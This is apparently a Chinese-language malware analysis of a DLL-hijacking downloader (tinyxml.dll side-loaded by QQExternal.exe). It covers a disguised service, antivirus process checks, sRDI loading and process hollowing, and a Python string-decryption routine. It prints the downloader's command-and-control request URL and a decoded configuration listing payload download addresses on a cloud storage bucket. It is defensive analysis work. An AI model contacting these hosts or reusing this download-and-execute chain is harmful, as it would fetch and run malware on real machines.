tinyxml.dll dll劫持下载器-

tinyxml.dll dll劫持下载器基本信息QQExternal.exe加载tinyxml.dll伪造证书pdb信息E:\其它文件\InternetRedirectNew\tinyxmlHook\Release\tinyxml.pdbdllmain流程创建服务服务信息:MicrosoftSetupSystemTask

目录基本信息pdb信息dllmain流程创建服务检查到360和卡巴斯基进程未检测到通过sRDI(原dllTools.dll)调用CreateHollowedProcess第二次通过sRDI执行http下载工作，代码与tinyxml.dll中一致字符串混淆方式载荷存储服务器

基本信息

QQExternal.exe加载tinyxml.dll

伪造证书

pdb信息

E:\其它文件\InternetRedirectNew\tinyxmlHook\Release\tinyxml.pdb

dllmain

流程

创建服务

服务信息:
MicrosoftSetupSystemTask
Microsoft Setup Update System Network Task
Microsoft 安装更新系统任务。请勿阻止或禁用这项服务，否则无法更新系统网络。
C:\ProgramData\Microsoft\Setup\QQExternal.exe

检查到360和卡巴斯基进程

直接发送http请求进入下一阶段
http请求:
http://[www.proxyconsole.com->ip]:8250/api.php?act=get_run_core&app=10001
(http://www.proxyconsole.com:8250/api.php?act=get_run_core&app=10001)
响应

eyJGaXJzdFNlbGVjdCI6MiwiQ29yZUZpbGUiOlt7IlR5cGUiOjEsIkVuYWJsZSI6dHJ1ZSwiQWRkcmVzcyI6Imh0dHBzOi8vcHJvLXJlczEub3NzLWNuLWhhbmd6aG91LmFsaXl1bmNzLmNvbS9SdW4vUHVwcGV0TGliLmRsbCIsIkhhc2giOiI1NjczNzZBMDJFMDBBNTk1ODc0RjU3NzY3ODRFMjM4RCJ9LHsiVHlwZSI6MiwiRW5hYmxlIjp0cnVlLCJOYW1lIjoiUVFFeHRlcm5hbC5leGUiLCJBZGRyZXNzIjoiaHR0cHM6Ly9wcm8tcmVzMS5vc3MtY24taGFuZ3pob3UuYWxpeXVuY3MuY29tL1J1bi9RUUV4dGVybmFsLmV4ZSIsIkhhc2giOiJBODI1M0E4NDJDMEFENkM0MDZEMDc3MEMxNDgzQjkwRCIsIlJlbHlPbk5hbWUiOiJDaGFuZ1RvQXZpRGxsUW1lV2ViLmRsbCIsIlJlbHlPbkFkZHJlc3MiOiJodHRwczovL3Byby1yZXMxLm9zcy1jbi1oYW5nemhvdS5hbGl5dW5jcy5jb20vUnVuL0NoYW5nVG9BdmlEbGxRbWVXZWIuZGxsIiwiUmVseU9uSGFzaCI6IjcwRTYwMThDQTA4OUJGN0IwM0FBREVDMTQ5RDk4NkZEIn0seyJUeXBlIjozLCJFbmFibGUiOnRydWUsIk5hbWUiOiJEaXMuZXhlIiwiQWRkcmVzcyI6Imh0dHBzOi8vcHJvLXJlczEub3NzLWNuLWhhbmd6aG91LmFsaXl1bmNzLmNvbS9SdW4vRGlzLmV4ZSIsIkhhc2giOiI3QzQ3N0IzNzg1RUMxOTgwMDE0QjZDQURENEM2MEMwOCIsIkNvbW1hbmRMaW5lIjoiR29Hb0dvIn1dfQ==

希望我今天分享的这篇文章可以帮到您。

base64解码后

{    "FirstSelect": 2,    "CoreFile": [{        "Type": 1,        "Enable": true,        "Address": "https://pro-res1.oss-cn-hangzhou.aliyuncs.com/Run/PuppetLib.dll",        "Hash": "567376A02E00A595874F5776784E238D"    }, {        "Type": 2,        "Enable": true,        "Name": "QQExternal.exe",        "Address": "https://pro-res1.oss-cn-hangzhou.aliyuncs.com/Run/QQExternal.exe",        "Hash": "A8253A842C0AD6C406D0770C1483B90D",        "RelyOnName": "ChangToAviDllQmeWeb.dll",        "RelyOnAddress": "https://pro-res1.oss-cn-hangzhou.aliyuncs.com/Run/ChangToAviDllQmeWeb.dll",        "RelyOnHash": "70E6018CA089BF7B03AADEC149D986FD"    }, {        "Type": 3,        "Enable": true,        "Name": "Dis.exe",        "Address": "https://pro-res1.oss-cn-hangzhou.aliyuncs.com/Run/Dis.exe",        "Hash": "7C477B3785EC1980014B6CADD4C60C08",        "CommandLine": "GoGoGo"    }]}

未检测到

通过sRDI(原dllTools.dll)调用CreateHollowedProcess

第二次通过sRDI执行http下载工作，代码与tinyxml.dll中一致

在第二次sRDI加载的pe中出现json库信息
E:\其它文件\InternetRedirectNew\Puppet

字符串混淆方式

字符串混淆方式：
非常明显的“C++编译时字符串加密”，国外很早就讨论了c++ – Compile-time string encryption – Stack Overflow

def xorfunc(buf:bytes,count:int,xorx,xory):    ret=b''    x,y=tuple(struct.pack('<2B',xorx,xory))    for i in range(count):        ret+=struct.pack('<B',x^((buf[i]-y)&0xff))    return ret

载荷存储服务器

https://pro-res1.oss-cn-hangzhou.aliyuncs.com